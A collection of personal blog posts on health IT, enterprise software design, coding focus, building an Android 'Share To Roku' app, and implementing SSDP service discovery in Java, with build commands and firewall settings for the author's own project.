Health IT: More I, less T

“USCDI vs. USCDI+ vs. EHI vs. HL7 FHIR US Core vs. IPA. Definitions, similarities, and differences as you understand them. Go!” —Anonymous, Twitter

I spent about a decade working in “Health Information Technology” — an industry that builds solutions for managing the flow of healthcare information. It’s a big tent that boasts one of the largest trade shows in the world and dozens of specialized venture funds. And it’s quite diverse, including electronic health records, consumer products, billing and cost management, image management, AI and analytics of every flavor you can imagine, and more. The money is huge, and the energy is huger.

Real world progress, on the other hand, is tough to come by. I’m not talking about health care generally. The tools of actual care keep rocketing forward; the rate limiter on tests and treatments seems only our ability to assess efficacy and safety fast enough. But in the HIT world, it’s mostly a lot of noise. The “best” exits are mostly acquisitions by huge insurance companies willing to try anything to squeak out a bit more margin.

That’s not to say there’s zero success. Pockets of awesome actually happen quite often, they just rarely make the jump from “promising pilot” to actual daily use at scale. There are many reasons for this, but primarily it comes down to workflow and economics. In our system today, nobody is incented to keep you well or to increase true efficiency. Providers get paid when they treat you, and insurance companies don’t know you long enough to really care about your long-term health. Crappy information management in healthcare simply isn’t a technology problem. But it’s an easy and fun hammer to keep pounding the table with. So we do.

But I’m certainly not the first genius to recognize this, and the world doesn’t need another cynical naysayer, so what am I doing here? After watching another stream of HIT technobabble clog up my Twitter feed this morning, I thought it might be helpful to call out four technologies that have actually made a real difference over the last few years. Perhaps we’ll see something in there that will help others find their way to a positive outcome. Or maybe not. Let’s give it a try.

A. Patient Portals

Everyone loves to hate on patient portals. I sure did during the time I spent trying to make HealthVault go. After all, most of us interact with at least a half dozen different providers and we’re supposed to just create accounts at all of them? And figure out which one to use when? And deal with their circa 1995 interfaces? Really?

Well, yeah. That’s pretty much how business works on the web. Businesses host websites where I can view my transaction history, pay bills, and contact customer support. A few folks might use aggregation services to create a single view of their finances or whatever, but most of us just muddle through, more-or-less happily, using a gaggle of different websites that don’t much talk to each other.

There were three big problems with patient portals a few years ago:

  1. They didn’t exist. Most providers had some third-party billing site where you could pay because, money. But that was it.
  2. When they did exist, they were hard to log into. You usually had to request an “activation code” at the front desk in person, and they rarely knew what you were talking about.
  3. When they did exist and you could log in, the staff didn’t use them. So secure messaging, for example, was pretty much a black hole.

Regulation fixed #1; time fixed #2; the pandemic fixed #3. And it turns out that patient portals today are pretty handy tools for interacting with your providers. Sure, they don’t provide a universal comprehensive view of our health. And sure, the interfaces seem to belong to a long ago era. But they’re there, they work, and they have made it demonstrably easier for us to manage care.

Takeaway: Sometimes, healthcare is more like other businesses than we care to admit.

B. Epic Community Connect & Care Everywhere

Epic is a boogeyman in the industry — an EHR juggernaut. Despite a multitude of options, fully a third of hospitals use Epic, and that percentage is much larger if you look at the biggest health systems in the country. It’s kind of insane.

It can easily cost hundreds of millions of dollars to install Epic. Institutions often have Epic consultants on site full time. And nobody loves the interface. So what is going on here? Well, mostly Epic is just really good at making life bearable for CIOs and their IT departments. They take care of everything, as long as you just keep sending them checks. They are extremely paternalistic about how their software can be used, and as upside-down as that seems, healthcare loves it. Great for Epic. Less so for providers and patients, except for two things:

Community Connect” is an Epic program that allows customers to “sublet” seats in their Epic installation to smaller providers. Since docs are basically required to have an EHR now (thanks regulation), this ends up being a no-brainer value proposition for folks that don’t have the IT savvy (or interest) to buy and deploy something themselves. Plus it helps the original customer offset their own cost a bit.

Because providers are using the same system here, data sharing becomes the default versus the exception. It’s harder not to share! And even non-affiliated Epic users can connect by enabling “Care Everywhere,” a global network run by Epic just for Epic customers. Thanks to these two things, if you’re served by the 33%+ of the industry that uses Epic, sharing images and labs and history is just happening like magic. Today.

Takeaway: Data sharing works great in a monopoly.

C. Open Notes

OpenNotes is one of those things that gives you a bit of optimism at a time when optimism can be tough to come by. Way back in 2010, three institutions (Beth Israel in MA, Geisinger in PA, and Harberview in WA) started a long-running experiment that gave patients completely unfettered access to their medical records. All the doctor’s notes, verbatim, with virtually no exception. This was considered incredibly radical at the time: patients wouldn’t understand the notes; they’d get scared and create more work for the providers; providers fearing lawsuits would self-censor important information; you name it.

But at the end of the study, none of that bad stuff happened. Instead, patients felt more informed and greatly preferred the primary data over generic “patient education” and dumbed-down summaries. Providers reported no extra work or legal challenges. It took a long time, but this wisdom finally made it into federal regulation last year. Patients now must be granted full access to their providers’ notes in electronic form at no charge.

In the last twelve months my wife had a significant knee surgery and my mom had a major operation on her lungs. In both cases, the provider’s notes were extraordinarily useful as we worked through recovery and assessed future risk. We are so much better educated than we would otherwise have been. An order of magnitude better than ever before.

Takeaway: Information already being generated by providers can power better care.

D. Telemedicine

It’s hard to admit anything good could have come out of a global pandemic, but I’m going to try. The adoption of telemedicine as part of standard care has been simply transformational. Urgent care options like Teladoc and Doctor on Demand (I’ve used both) make simple care for infections and viruses easy and non-disruptive. For years insurance providers refused “equal pay” for this type of encounter; it seems that they’ve finally decided that it can help their own bottom line.

Just as impactful, most “regular” docs and specialists have continued to provide virtual visits as an option alongside traditional face-to-face sessions. Consistent communication between patients and providers can make all the difference, especially in chronic care management. I’ve had more and better access to my GI specialists in the last few years than ever before.

It’s only quite recently that audio and video quality have gotten good enough to make telemedicine feel like “real” medicine. Thanks for making us push the envelope, COVID.

Takeaway: Better care and efficiency don’t have to be mutually exclusive.

So there we go. There are ways to make things better with technology, but you have to work within the context of reality, and they ain’t always that sexy. We don’t need more JSON or more standards or more jargon; we need more information and thoughtful integration. Just keep swimming!

Form and Function

I love reality TV about making stuff and solving problems. My family would say “to a fault.” Just a partial list of my favs:

I could easily spin a tangent about experiential archeology and the absolutely amazing Ruth Goldman, but I’ll be restrained about that (nope): Secrets of the Castle, Tudor Monastery Farm, Tales from the Green Valley, Edwardian Farm, Victorian Farm, Wartime Farm.

ANYWAY.

Recently I discovered that old Project Runway seasons are available on the Roku Channel, so I’ve been binging through them; just finished season fourteen (Ashley and Kelly FTW). At least once per year, the designers are asked to create a look for a large ready-to-wear retailer like JCPenney or JustFab or whatever. These are my favorites because it adds a super-interesting set of constraints to the challenge — is it unique while retaining mass appeal, can it be reproduced economically, will it read well in an online catalog, etc. etc.. This ends up being new for most of the participants, who think of themselves (legitimately) as “artists” and prefer to create fashion for fashion’s sake. Many of them have never created anything other than bespoke pieces and things often go hilariously off the rails as their work is judged against real world, economic criteria in addition to innovation and aesthetics. Especially because the judges themselves often aren’t able to express their own expectations clearly up front.

This vibe brings me back to software development in an enterprise setting (totally normal, right?). So many developers struggle to understand the context in which their work is judged. After all, we learned computer science from teachers for whom computer science itself is the end goal. We read about the cool new technologies being developed by tech giants like Facebook and Google and Amazon. All of our friends seem to be building microservices in the cloud using serverless backends and nosql map/reduce data stores leveraging deep learning and … whatever. So what does it mean to build yet another integration between System A and System B? What, in the end, is the point?

It turns out to be pretty simple:

  1. Does your software enable and accelerate business goals right now, and
  2. Does it require minimal investment to do the same in the future?

Amusingly, positive answers to both of these turn out to be pretty much 100% correlated not with “the shiniest new language” or “what Facebook is doing” but instead beautiful and elegant code. So that’s cool; just like a great dress created to sell online, successful enterprise code is exceptional both in form and function. Nice!

But as easy as these tests seem, they can be difficult to measure well. Enterprises are always awash in poorly-articulated requirements that all “need” to be ready yesterday. Becoming a slave to #1 can seem like the right thing — “we exist to serve the business” after all — but down that road lies darkness. You’ll write crappy code that doesn’t actually do what your users need anyways, breaks all the time and ultimately costs a ton in refactoring and lost credibility.

Alas, #2 alone doesn’t work either. You really have no idea what the future is going to look like, so you end up over-engineering into some super-generalized false utopian abstraction that surely costs more than it should to run and doesn’t do any one thing well. And it is true that if your business isn’t successful today it won’t exist tomorrow anyways.

It’s the combination that makes the magic. That push and pull of building something in the real world now, that can naturally evolve over time. That’s what great engineering is all about. And it primarily comes down to modularity. If you understand and independently execute the modules that make up your business, you can easily swap them in and out as needs change.

In fact, that’s why “microservices” get such play in the conversation these days — they are one way to help enforce separation of duties. But they’re just a tool, and you can create garbage in a microservice just as easily as you can in a monolith. And holy crap does that happen a lot. Technology is not the solution here … modular design can be implemented in any environment and any language.

  • Draw your business with boxes and arrows on one piece of paper.
  • Break down processes into independent components.
  • Identify the core data elements, where they are created and which processes need to know about them.
  • Describe the conversations between components.
  • Implement (build or buy) each “box” independently. In any language you want. In any environment that works for you.

Respect both form and function, knitting together a whole from independent pieces, and you are very likely to succeed. Just like the best designers on Project Runway. And the pottery show. And the baking one. And the knife-making one. And the …

Focus

OK, let’s see if I can actually get this thing written.

It’s a little hard to focus right now. We’re almost two weeks into life with Copper the shockingly cute cavapoo puppy. He’s a great little dude, and life is already better with him around. But holy crap, it’s like having a human baby again — except that I’m almost thirty years older, and Furry-Mc-Fur-Face doesn’t use diapers, so it seems like every ten minutes we’re headed outside to do his business. Apparently it’s super-important to provide positive reinforcement for this, so if you happen to see me in the back yard at 3am waxing poetic about pee and/or poop, well, yeah.

What’s interesting about my inability to focus (better explanation of this in a minute) is that it’s not like I don’t have blocks of open time in which I could get stuff done. Copper’s day is an endless cycle of (a) run around like crazy having fun; (b) fall down dead asleep; (c) go to the bathroom; (d) repeat — with a few meals jammed in between rounds. Those periods when he sleeps can be an hour or more long, so there’s certainly time in the day to be productive.

And yet, in at least one very specific way, I’m not. “Tasks” get done just fine. The dishes and clothes are clean. I take showers. I even mowed the lawn the other day. I’m caught up on most of my TV shows (BTW Gold Rush is back!). But when I sit down to do something that requires focus, it’s a lost cause. Why is that?

Things that require focus require me to hold a virtual model of the work in my head. For most of my life the primary example of this has been writing code. But it applies to anything that requires creation and creativity — woodworking, writing, art, all of that stuff. These models can be pretty complicated, with a bunch of interdependent and interrelated parts. An error in one bit of code can have non-obvious downstream effects in another; parallel operations can bump into each other and corrupt data; tiny changes in performance can easily compound into real problems.

IMNSHO, the ability to create, hold and manipulate these mental models is a non-negotiable requirement to be great at writing and debugging code. All of the noise around TDD, automated testing, scrums and pair programming, blah blah blah — that stuff might make an average coder more effective I suppose, but it can’t make them great. If you “walk” through your model step by step, playing out the results of the things that can go wrong, you just don’t write bugs. OK, that’s bullsh*t — of course you write bugs. But you write very few. Folks always give me crap for the lack of automated tests around my code, but I will go toe-to-toe with any of them on code quality — thirty years of bug databases say I’ll usually win.

The problem, of course, is that keeping a complex model alive requires an insane amount of focus. And focus (the cool kids and my friend Umesh call it flow state) requires a ton of energy. When I was just out of school I could stay in the zone for hours. No matter what was going on in the other parts of my life, I could drop into code and just write (best mental health therapy ever). But as the world kept coming at me, distractions made it increasingly difficult to get there. Kids and family of course, but work itself was much more problematic. As I advanced in my career, my day was punctuated with meetings and budgets and managing and investors and all kinds of stuff.

I loved all of that too (ok maybe not the meetings or budgets), but it meant I had smaller and smaller time windows in which to code. There is nothing more antithetical to focus than living an interrupt-driven existence. But I wasn’t going to quit coding, so it forced me to develop two behaviors — neither rocket science — that kept me writing code I was proud of:

1. Code in dedicated blocks of time.

Don’t multitask, and don’t try to squeeze in a few minutes between meetings. It takes time to establish a model, and it’s impossible to keep one alive while you’re responding to email or drive-by questions. Establish socially-acceptable cues to let people know when you need to be left alone — one thing I wish I’d done more for my teams is to set this up as an official practice. As an aside, this is why open offices are such horsesh*t for creative work — sometimes you just need a door.

2. Always finish finished.

This is actually the one bit of “agile” methodology that I don’t despise. Break up code into pieces that you can complete in one session. And I mean complete — all the error cases, all the edges, all of it. Whatever interface the code presents — an API, an object interface, a UX, whatever — should be complete when you let the model go and move on to something else. If you leave it halfway finished, the mental model you construct “next time” will be just ever so slightly different. And that’s where edges and errors get missed.

Finishing finished improves system architecture too — because it forces tight, compact modularity. For example, you can usually write a data access layer in one session, but might need to leave the cache for later. Keeping them separate means that you’ll test each more robustly and you’ll be in a position to replace one or the other as requirements morph over time. As an extra bonus, you get a bunch of extra endorphin hits, because really finishing a task just feels awesome.

OK sure, sounds great. But remember my friend Copper? In just the few sessions I’ve taken to write this little post, he’s come by dozens of times to play or make a quick trip outside. And even when I’m not paying him active attention, part of my brain always has to be on alert. Sometimes, distractions become so intense that the reality is you just won’t be successful at creative work, because your brain simply won’t focus. It hurts to say that, but better to acknowledge it than to do a crap job. The good news is that these times are usually transient — Copper will only be a brand new puppy for a few weeks, and during that time I just have to live with lower productivity. It’s not the end of the world, so long as I understand what’s going on and plan for it.

If you’re a manager, you really need to be on the lookout for folks suffering from focus-killing situations. New babies, new houses or apartments, health problems, parent or relationship challenges, even socio-political issues can catch up with people before they themselves understand what’s going on. Watch for sudden changes in performance. Ask questions. Maybe they just need some help learning to compartmentalize and optimize their time. Or maybe they need you to lighten the load for a few weeks.

Don’t begrudge them that help! Supporting each other through challenging times forges bonds that pay back many times over. And besides, you’ll almost certainly need somebody to do the same for you someday. Pay it forward.

Share to Roku!

TLDR: if you watch TV on a Roku and have an Android phone, please give my new Share To Roku app a try! It’s currently in open testing; install it with this link on the web or this link on your Android device. The app is free, has no ads, saves no data and only makes network calls to Rokus on your local network. It acts as a simple remote, but much more usefully lets you “Share” show names from the web or other apps directly to the Roku search interface. I use it with TV Time and it has been working quite well so far — but I need broader real-world testing and would really appreciate your feedback.

Oh user interface development, how I hate you so. But my lack of experience with true mobile development has become increasingly annoying, and I really wanted an app to drive my Roku. So let’s jump back into the world of input events and user interface layouts and see if we can get comfy. Yeesh.

Share To Roku in a nutshell

I’ve talked about this before (here and here). My goal is to transition as smoothly as possible from finding a show on my phone (an Android, currently the Samsung Galaxy S21) to watching it on my TV. I keep my personal watchlist on an app called TV Time and that’s key, but I also want to be able to jump from a recommendation in email or a review on the web. So feature #1 is to create a “share target” that can accept messages from any app.

Armed with this inbound search text, the app will help the user select their Roku, ensure the TV power is on (if that particular Roku supports it), and forward the search. The app then will land on a page hosting controls to help navigate the last mile to the show (including a nice swipe-enabled directional pad that IMNSHO is way better than the official Roku app). This remote control functionality will also be accessible simply by running the app on its own. And that’s about it. Easy peasy!

All of the code for Share To Roku is up on github. I’ll do a final clean-up on the code once the testing period is over, but everything I’ve written here is free to use and adopt under an MIT license, so please take anything you find useful.

Android Studio and “Kotlin”

If you’ve worked with me before, you know that my favorite “IDE” is Emacs; I build stuff from the command line; and I debug using logs and jdb. But for better or worse, the only realistic way to build for Android is to at least mostly use Android Studio, a customized version of IntelliJ IDEA (you can just use IntelliJ too but that’s basically the same thing). AStudio generates a bunch of boilerplate code for even the simplest of apps, and encourages you to edit it all in this weird overlapping sometimes-textual-sometimes-graphical mode that at least in my experience generally ensures a messy final product. I’m not going to spend this whole article complaining about it, but it is pretty stifling.

Love me a million docked windows, three-deep toolbars and controls on every edge of the screen!

Google would also really prefer that you drop Java and instead use their trendy sort-of-language “Kotlin” to build Android apps. I’ve played this Java pre-complier game before with Scala and Groovy, and all I can say is no thank you. I will never understand why people are so obsessed with turning code into a nest of side effects, just to avoid a few semicolons and brackets. At least for now they are grudgingly continuing to support Java development — so that’s where you’ll find me. On MY lawn, where I like it.

Android application basics

Components

The most important thing to understand about Android development is that you are not in charge of your process. There is no “main” and, while you get your own JVM in which to live, that process can come and go at pretty much any time. This makes sense — at least historically mobile devices have had to manage pretty limited memory and processing power, so the OS exerts a ton of control over the use of those resources. But it can be tricky when it comes to understanding state and threading in an app, and clearly a lot of bugs in the wild boil down to a lack of awareness here.

Instead of main, an Android app is effectively a big JAR that uses a manifest file to expose Component classes. The most common of these is an Activity, which is effectively represents one user interface screen within the app. Other components include various types of background process; I’m going to ignore them here. Share to Roku exposes two Activities, one for choosing a Roku and one for the search and remote interface. Each activity derives from an Android base class that defines a set of well-known entrypoints, each of which is called at different points in the process lifecycle.

Tasks and the Back Stack

But before we dig into those, two other important concepts: tasks and the back stack. This can get wildly complicated, but the super-basics are this:

  • A “task” is a thing you’re doing on the device. Most commonly tasks are born by opening an app from the home screen.
  • Each task maintains a “stack” of activities (screens). When you navigate to a new screen (e.g., open an email from a list of emails) a new activity is added to the top of the stack. When you hit the back button, the current (top) activity is closed and you return to the previous one.
  • Mostly each task corresponds to an app — but not always. For example, when you are in Chrome and you “share” a show to my app, a new Share To Roku activity is added to the Chrome task. Tasks are not the same as JVM processes!

Taken together, the general task/activity lifecycle starts to make sense:

  1. The user starts a new task by starting an app from the home screen.
  2. Android starts a JVM for that app and loads an instance of the class for the activity marked as MAIN/LAUNCHER in the manifest.
  3. The onCreate method of the activity is called.
  4. The user interacts with the ux. Maybe at some point they dip into another activity, in which case onPause/onResume and onStop/onStart are called as the new activity starts and finishes.
  5. When the activity is finished (the user hits the back button or closes the screen in some other way) the onDestroy method is called.
  6. When the system decides it’s a good time (e.g., to reduce memory usage), the JVM is shut down.

Of course, it’s not really that simple. For example, Android may just nuke your process at any time, without ever calling onDestroy — so you’ll need to put some thought into how and when to save persistent data. And depending on your configuration, existing activity instances may be “reused” (with a call to onNewIntent). But it’s a pretty good starting place.

Intents

Intents are the means by which users navigate between activities on an Android device. We’ve actually already seen an intent in action, in step #2 above — MAIN/LAUNCHER is a special intent that means “start this app from the beginning.” Intents are used for every activity-to-activity transition, whether that’s explicit (e.g., when an email app opens up a message details activity in response to a click in a message list) or implicit (e.g., when an app opens up a new, pre-populated text message without knowing which app the user has configured for SMS).

Share to Roku uses intents in both ways. Internally, after picking a Roku, ChooseRokuActivity.shareToRoku instantiates an intent to start the ShareToRokuActivity. Because that internal navigation is the only way to land on ShareToRokuActivity, its definition in the manifest sets the “exported” flag to false and doesn’t include any intent-filter elements.

Conversely, the entry for ChooseRokuActivity in the manifest sets “exported” to true and includes no less than three intent-filter elements. The first is our old friend MAIN/LAUNCHER, but the next two are more interesting. Both identify themselves as SEND/DEFAULT filters, which mark the activity as a target for the Android Sharesheet (which we all just know as “sharing” from one app to another). There are two of them because we are registering to handle both text and image content.

Wait, image content? This seems a little weird; surely we can’t send an image file to the Roku search API. That’s correct, but it turns out that when the TV Time app launches a SEND/DEFAULT intent, it registers the content type as an image. There is an image; a little thumbnail of the show, but there is also text included which we use for the search. There isn’t a lot of consistency in the way applications prepare their content for sharing; I foresee a lot of app-specific parsing in my future if Share To Roku gets any real traction with users.

ChooseRokuActivity

OK, let’s look a little more closely at the activities that make up the app. ChooseRokuActivity (code / layout) is the first screen a user sees; a simple list of Rokus found on the local network. Once the user makes a selection here, control is passed to ShareToRokuActivity which we’ll cover next.

The list is a ListView, which gives me another opportunity to complain about modern development. Literally every UX system in the world has a control for simple displays of text-based lists. Android’s ListView is just this — a nice, simple control to which you attach an Adapter that holds the data. But the Android Gods really would rather you don’t use it. Instead, you’re supposed to use RecyclerView, a fine but much more complicated view. It’s great for large, dynamic lists, but way too much for most simple text-based UX lists. This kind of judgy noise just bugs me — an SDK should make common things as easy as possible. Sorry not sorry, I’m using the ListView. Anyways, the list is wrapped in a SwipeRefreshLayout which provides the gesture and feedback to refresh the list by pulling down.

The activity populates the list of Rokus using static methods in Roku.java. Discovery is performed by UDP broadcast in Ssdp.java, a stripped down version of the discovery classes I wrote about extensively in Anyone out there? Service discovery with SSDP, WSD, other acronyms. The Roku class maintains a static (threadsafe) list of the Rokus it finds, and only searches again when asked to manually refresh. This is one of those places where it’s important to be aware of the process lifecycle; the list is cached as long as our JVM remains alive and will be used in any task we end up in.

Take a look at the code in initializeRokus and findRokus (called from onCreate). If we have a cache of Rokus, we populate it directly into the list for maximum responsiveness. If we don’t, we create an ActivityWorker instance that searches using a background thread. The trick here is that each JVM process has exactly one thread dedicated to managing all user interface interactions — only code running on that thread can touch the UX. So if another thread (e.g., our Roku search worker) needs to update user interface components (i.e., update the ListView), it needs help.

There are a TON of ways that people manage this; ActivityWorker is my solution. A caller implements an interface with two methods: doBackground is run on a background thread, and when that method completes, the code in doUx runs on the UI thread (thanks to Activity.runOnUiThread).  These two methods can share member variables (e.g., the “rokus” set) without worrying about concurrency issues — a nice clean wrapper for a common-but-typically-messy situation.

ShareToRokuActivity

The second activity (code / layout) has more UX going on, and I’ll admit that I appreciated the graphical layout tools in AStudio. Designing even a simple interface that squishes and stretches reasonably to fit on so many different device sizes can be a challenge. Hopefully I did an OK job, but testing with emulators only goes so far — we’ll see as I get a few more testers.

If the activity was started from a sharing operation, we pick up that inbound text as “extra” data that comes along with the Intent object (the data actually comes to us indirectly via ChooseRokuActivity, since that was the entry point). Dealing with this search text is definitely the most unpleasant part of the app, because it comes in totally random and often unhelpful forms. If Share To Roku is going to become a meaningfully useful tool I’m going to have to do some more investment here.

A rare rave from me — the Android Volley HTTP library (as used in Http.java) is just fantastic. It works asynchronously, but always makes its callback on the UX thread. That is, it does automatically what I had to do manually with ActivityWorker. Since most mobile apps are really just UX sitting atop some sort of HTTP API, this makes life really really easy. Love it!

The bulk of this activity is just buttons and lists that cause fire-and-forget calls to the Roku, except for the directional pad that takes up the center of the screen. CirclePad.java is a custom control (sorry, custom “View”) that lets the user click a center button and indicate direction with either clicks in the N-S-E-W regions or (way cooler) directional swipes. A long press on the control sends a backspace, which makes entering text on the TV a bit more pleasant. Building this control felt like a throwback to Windows 3.0 development. Set a clip region, draw some lines and circles and icons. The gesture recognition is simultaneously amazingly easy (love the “fling” handler) and oddly prehistoric (check out my manual identification of a “long” press).

Publishing to the Play store

Back in the mid 00’s I spent some time consulting for Microsoft on a project called Windows Marketplace (wow there is a Wikipedia article for everything). Marketplace was sponsored by the Windows marketing team as an attempt to highlight the (yes) shareware market, which had been basically decimated by cross-platform browser-based apps. It worked a lot like any other app store, with some nice features like secure backup of purchased license keys (still a thing with some software!!!). It served a useful role for a number of years — fun times with a neat set of people (looking at you Raj, Vikram, DeeDee, Paul, Matt and Susan) and excellent chaat in Emeryville.

Anyways, that experience gave me some insight into the challenges of running and monetizing a directory of apps developed by everyone from big companies to (hello) random individuals. Making sure the apps at least work some of the time and don’t contain viruses or some weirdo porn or whatever. It’s not easy — but Google and Apple really have really done a shockingly great job. Setting up account on the Play Console is pretty simple — I did have to upload an image of my official ID and pay a one-time $25 fee but that’s about it. The review process is painful because each cycle takes about three or four days and they often come back with pretty vague rejections. For example, “you have used a word you may not have the rights to use” … which word is, apparently, a secret? But I get it.

So anyways — my lovely little app is now available for testing. If you’ve got an Android device, please use the links below to give it a try. If you have an Apple device, I’m sorry for many reasons. I will definitely be doing some work to better manipulate inbound search strings to provide a better search result on the Roku. I’m a little torn as to whether I could just do that all in-app, or if I should publish an API that I can update more easily. Probably the latter, although that does create a dependency that I’m not super-crazy about. We’ll see.

Install the beta version of Share To Roku with this link on the web or this link on your Android device.

Anyone out there? Service discovery with SSDP, WSD, other acronyms.

Those few regular readers of this stuff may remember What should we watch tonight, in which I used the Roku API to build a little web app to manage my TV watchlist. Since then I’ve found TV Time, which is waaay better and even tells me how many days until the next season of Cobrai Kai gets here (51 as of this writing). But what it doesn’t do is launch shows automatically on my TV, and yes I’m lazy enough to be annoyed by that. So I’ve been planning a companion app that will let me “share” shows directly to my Roku using the same API I used a few months ago.

This time, I’d like the app to auto-discover the TV, rather than asking the user to configure its IP address manually. Seems pretty basic — the Roku ECP API describes how it uses “Simple Service Discovery Protocol” to enable just that. But man, putting together a reliable implementation turned out to be a bear, and sent me tumbling down a rabbit hole of “service discovery” that was both fascinating and frankly a bit appalling.

Come with me down that rabbit hole, and let’s learn how those fancy home devices actually try to find each other. It’s nerd-tastic!

Can I get your number?

99% of what happens on networks is conversations between two devices that already know each other, either directly by address (like a phone number), or by a name that they use to look up an address (like using a phone book). And 99% of the time this works great — between “google.com” and QR codes and the bookmark lists we’ve all built up, there’s rarely any need to even think about addresses. But once in awhile — usually when you’re trying to set up a printer or some other smarty-pants device on your home network — things get a bit more complicated.

Devices on your network are assigned a (basically) arbitrary address by your wifi router, and they don’t have a name registered anywhere, so how do other devices find them to start a conversation? It turns out that there are a pile of different ways — most of which involve either multicast or broadcast UDP messaging, two similar techniques that enable a device to initiate a conversation without knowing exactly who it’s talking to. Vox Clamantis in Deserto as it were.

Side note: for this post I’m going to limit examples to IPv4 addressing, because it makes my job a little easier. The same concepts generally apply to IPv6, except that there is no true “broadcast” with v6 because they figured out that multicast could do all the same things more efficiently, but close enough.

An IP broadcast message is received by all devices on the local network that are listening on a given port. Typically these use the special “limited broadcast” address 255.255.255.255 (there’s also a “directed” broadcast address for each subnet which could theoretically be routed to other networks, but that’s more detail than matters for us). An IP multicast message is similar, but is received only by devices that have subscribed to (or joined) the multicast’s special “group” address. Multicast addresses all have 1110 as their most significant bits, which translates to addresses from 224.0.0.0 to 239.255.255.255.

Generally, these messages are restricted to your local network — that is, routers don’t send them out onto the wider Internet (there are exceptions for complex corporate-style networks, but whatever). This is a good thing, because the cacophony of the whole world getting all of these messages would most definitely take down the Internet. It’s also safer, as we’ll see a bit later.

Roku and SSDP

OK, back to the main thread here. Per the ECP documentation, Roku devices use Simple Service Discovery Protocol for discovery. SSDP defines a multicast address (239.255.255.250) and port (1900), a set of messages using what old folks like me still call RFC 822 format, and two interaction patterns for discovery:

  1. A client looking for devices sends a multicast M-SEARCH message with the type ssdp:discover, setting the ST header to either ssdp:all (everybody respond!) or a specific service type string (the primary Roku type is roku:ecp). AFAIK there is no authoritative list of ST values, you just kind of have to know what they are.  Devices listening for these requests respond directly to the client with a unicast HTTP OK response that includes (thank you) addressing information.
  2. Clients can also listen on the same multicast address for NOTIFY messages of type ssdp:alive or ssdp:byebye; devices send these out when they are turned on and off. It’s a good way to keep a list of devices accurate, but implementations are spotty so it really needs to be used in combination with #1.

An SSDP client in Java

Seems simple, right? I mean, OK, the basics really are simple. But a robust implementation runs into a ton of nit-picky little gotchas that, all together, took me days to sort out. The end result is on github and can be built/tested on any machine with java, git and maven installed (be sure to fix up slashes on Windows):

git clone https://github.com/seanno/shutdownhook.git
cd shutdownhook/toolbox
mvn clean package
java -cp target/toolbox-1.0-SNAPSHOT.jar \
    com.shutdownhook.toolbox.discovery.ServiceDiscovery \
    ssdp

This command line entrypoint just sends out an ssdp:discover message, displays information on all the devices that respond, and loops listening for additional notifications. Somebody on your network is almost sure to respond; in particular for Roku you can look for a line something like this:

+++ ALIVE: uuid:roku:ecp:2N006D062746 | roku:ecp | http://192.168.86.47:8060/ | (/192.168.86.47:1900)

Super cool! If you open up that URL in a browser you’ll see a bunch more detail about your Roku and the interfaces it supports.

Discovery Protocol Abuse

If you don’t see any responses at all, it’s likely that your firewall is blocking UDP messages either to or from port 1900 — my Linux Mint distribution does both by default. Mint uses UncomplicatedFirewall which means you can see blocking activity (as root) in /var/log/ufw.log and open up UDP port 1900 with commands like:

sudo ufw allow from any port 1900 to any proto udp
sudo ufw allow from any to any port 1900 proto udp

Before you do this, you should be aware that there is some potential for bad guys to do bad stuff — pretty unlikely, but still. Any protocol that can “amplify” one message into many (because multiple devices can respond) carries some risk of a denial-of-service attack. That can be very simple: a bad guy on your network just fires off a ton of M-SEARCH requests, prompting a flood of responses that overwhelm the network as a whole. Or it can be nastier: combined with “ip spoofing,” a bad guy can redirect amplified responses to an unsuspecting victim.

Really though, it’s pretty theoretical for a home network — routers don’t generally route these messages, so it’d have to be an inside job anyways. And once you’ve got a bad actor inside your network, they can probably do a lot more damage than just slowing it down. YMMV, but I’m not personally super-worried about this particular attack. Just please don’t confuse my blasé assessment here with the risks of the related Universal Plug-and-Play (UPnP) protocol, which are quite real.

Under the Covers

There is quite a bit to talk about in the code here. Most of the hard work is in UdpServiceDiscovery.java (I’ll explain this abstraction later), which uses two sockets and two worker threads:

Socket/Thread #1 (DISCOVERY) sends M-SEARCH requests and receives back HTTP OK responses. A request is sent when the thread first starts up and can be repeated either on demand or on a timer (by default every twenty minutes).

It’s key to understand that while the request here is a multicast message, the responses are sent back directly as a unicast. I didn’t implement the server side specifically, but you can see how this works in the automated tests — the responding device extracts the source address and port from the multicast and just replies with a standard UDP unicast message. This is important for us because only one process on a computer can actively listen for unicast messages on a port. And on many systems, somebody is probably already doing that on port 1900 (for example, the Windows service “SSDP Discovery”). So if we want to reliably hear HTTP OK responses, we need to be using an unused, automatically-assigned port for this socket.

Socket/Thread #2 (NOTIFICATION) is for receiving unsolicited NOTIFY multicasts. This socket uses joinGroup to register interest and must be opened on port 1900 to work correctly.

forEachUsefulInterface is an interesting little bit of code. It’s used both for sending requests and joining multicast groups, ensuring that the code works in a system that is connected to multiple network interfaces (typically not the case at home, but better safe than sorry). Remember that multicasts are restricted to a local network — so if you’re attached to multiple networks, you’ll need to send out one message on each of them. The realities of coordinating interfaces with addresses can get pretty complicated, but I think this gets it right. Let me know if you think I’ve missed something!

The class also tries to identify and ignore duplicate UDP messages. Dealing with dups just comes with the territory when working with UDP — and while the nature of the SSDP protocol means it generally doesn’t hurt anything to re-process them, it’s just icky. UdpServiceDiscovery tries to filter them out using message hashing and a FIFO queue of recently-received messages. You can tune this behavior (or turn it off) through config; default is a two-second lookback.  

Wait, is that Everyone? Enter WS-Discovery.

If you look closely you’ll see that UdpServiceDiscovery really isn’t specific to SSDP at all — all of the protocol-specific stuff is in Ssdp.java and transits through yet another class ServiceDiscovery.java. What the heck is going on here? The short story is that SSDP doesn’t return most printers, and Microsoft always needs to be special. The longer story requires a quick aside into the insanity that was “WS*”.

Back in 1999 and 2000, folks realized that HTTP would be great for APIs as well as web pages — and two very different approaches emerged. First by a few months was SOAP (and it’s fast-follower WSDL), which tried to be transport-independent (although 99.9% of traffic was over HTTP) and was all about defined, strongly typed interfaces. The foil to SOAP was REST — a much lighter and Internettish way to think about machine-to-machine interaction.

SOAP was big company, REST was scrappy startup. And nobody was more SOAPy than Microsoft. They had a whole group (I’m looking at you Bill, and your buddy John too) that did nothing but make up abstract, overly-complicated, insane SOAP-based “standards” informally known as “WS*” that nobody understood or needed. Seriously, just check out this poster (really, click that link, zoom in and scroll for awhile, it’s shocking). Spoiler alert: REST crushed it.

